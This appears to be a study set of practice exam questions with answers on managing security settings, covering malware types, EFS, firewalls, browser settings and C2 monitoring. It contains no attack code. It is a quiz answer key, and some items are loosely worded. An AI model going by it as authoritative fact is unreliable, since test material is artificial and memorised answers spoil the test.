Lesson 17: Managing Security Settings

A security analyst receives a notification of possible malware based on common indicators. After conducting several analyses, the analyst learns the malware used Windows PowerShell to create new malicious processes in the computer's memory. What is the analyst's computer likely infected with?

Fileless malware

Fileless malware refers to malicious code that uses the host’s scripting environment, such as Windows PowerShell or PDF JavaScript, to create _________________________.

new malicious processes in memory

Worms__________ processes in system memory rather than infecting an executable file stored on a disk.

replicate between

Boot sector viruses infect the boot sector code or _______ on a disk drive. While this could be a possible option, memory-based malware running inside the code of another program is quite common.

partition table

Viruses are concealed within the code of an_______________ stored as a file on a disk. In Windows, executable code has extensions such as .EXE, .MSI, .DLL, .COM, .SCR, and .JAR.

executable process image

A manager is responsible for client laptops, and is concerned about exposing data on the disks to a different OS and the permissions becoming overridden. What will help prevent this possible attack?

Encrypting File System

The Encrypting File System (EFS) feature of the New Technology File System (NTFS) ___________________. EFS is not available in the Home edition of Windows.

supports file and folder encryption

The Windows Defender Firewall with Advanced Security console allows the configuration of a custom___________________________?

inbound and outbound filtering rule.

Antivirus is software that can detect malware and ______________. The primary means of detection is to use a database of known virus patterns called definitions, signatures, or patterns

prevent it from executing

Execution control refers to_______________ designed to prevent malicious software from running on a host regardless of what the user account privileges allow.

logical security technologies

A security administrator wants to set up anomalistic monitoring around behavioral-based user activity. Which of the following could the administrator implement for monitoring? (Select all that apply.)

• Failed attempts

• Login times

• Concurrent logins

A security manager in charge of the vulnerability program for the enterprise is looking at mobile security. They are reading about a "walled garden" approach. What does this entail?

Trusted source

Mobile OS vendors use this "walled garden" model of ____________ as well. Apps are distributed from an approved store, such as Apple's App Store or the Windows Store.

software distribution

One of the problems with legacy versions of Windows is that when an_________________ or a USB drive is attached, Windows would automatically run commands defined in an autorun.inf file.

optical disc is inserted

Concurrent logins are another behavioral-based ____________. Most users should only need to sign in to one computer at a time.

monitoring mechanism

A server administrator notices that a few servers in their screened subnet (demilitarized zone) went from around 5% central processing unit (CPU) utilization to 95%. They also notice the machines lack many patches. If malware infects the servers, what is the likely cause of the high CPU utilization?

Cryptomining software

A cryptominer hijacks the resources of the host to perform cryptocurrency mining. This is also referred to as ___________.

cryptojacking

Ransomware is a type of malware that tries to extort money from the victim. Crypto-ransomware attempts to ____________, removable, and network drive.

encrypt files on any fixed

Rogue antivirus is a particularly popular way to ____________. In the early versions of this attack, a website would display a pop-up disguised as a normal Windows dialog box with a fake security alert.

disguise a Trojan

Modern malware is usually designed to implement some type of __________, also referred to as a remote access Trojan (RAT).

backdoor

A helpdesk operator is reviewing a notification that a user clicked links in a very suspicious email. After verifying there are symptoms of malware, what is the next step the operator should take?

Quarantine.

Once the ________ is isolated, the next step is to disable System Restore and other automated backup systems, such as File History.

infected system

Another good step after isolation is to look for additional executable files with names similar to those of____________ files and utilities, such as scvhost.exe or ta5kmgr.exe.

authentic system

A Firefox user wants to open up their browser settings to configure their intranet as the home page. How can the Firefox user access the settings?

about:preferences

A security analyst baselines web activity and notices several caveats with browsers. For example, they notice that when a user types in a query, a query is actually made after every typed key. The analyst is trying to group browser activity together. Which browser is based on the same code as Chrome?

Edge

A user visits a news site that they go to frequently, and the news articles are not updated but are the same as the day before. The user also hears complaints about people not having internet, which is odd since they are on their normal news site. What is most likely going on?

Page is cached.

A developer wants to create functionality for a web browser by making API calls on the back end. What should the developer build?

Extension

Extensions add or change a __________ via its application programming interface (API). The extension must be granted specific permissions to make configuration changes. With sufficient permissions, they can run scripts to interact with the pages the developer is looking at.

browser feature

Plug-ins play or show some sort of _______ in a web page, such as Flash, Silverlight, or other video/multimedia format.

content embedded

A security manager wants to set up a program where they can proactively mitigate malware infection as much as possible. Which of the following is least helpful in this endeavor?

Update trusted root certificates

A server administrator helps the human resources department build a new internal website for their new training platform that needs to remain secure. What will the administrator need to do to ensure the web page shows up as secure?

Add trusted certificates.

Unless the site is running a _______, the firewall would not need to be adjusted. Normal web traffic operates off ports 80 and 443.

non-standard port

A security manager is setting up a password policy for users. Which of the following is the best security practice when it comes to passwords?

Length

A developer is reading their email and comes across a new memorandum from the security department about a clean desk policy. Why does security need to publish this?

Personal identifiable information (PII) protection

A system user______ is one that is required before any operating system can boot. The system password can be configured by the basic input/output system (BIOS) or unified extensible firmware interface (UEFI) setup program.

password

A security manager sets up a defense in depth mechanism and sets up monitoring to catch communications from the attacker to the malware. What is the manager monitoring for?

C2

Whether a backdoor is used as a standalone intrusion mechanism or to manage bots, the threat actor must establish a _________ from the compromised host to a command and control (C2 or C&C) host or network.

connection

Spyware is malware that can perform _________, such as allowing tracking cookies, changing default search providers, opening arbitrary pages at startup, adding bookmarks, and so on.

browser reconfigurations

A keylogger is spyware that actively attempts to steal confidential information by ______keystrokes.

recording

When dealing with a rootkit, administrators should be aware that there is the possibility that it can compromise system files and programming interfaces so that_____________no longer reveal their presence.

local shell processes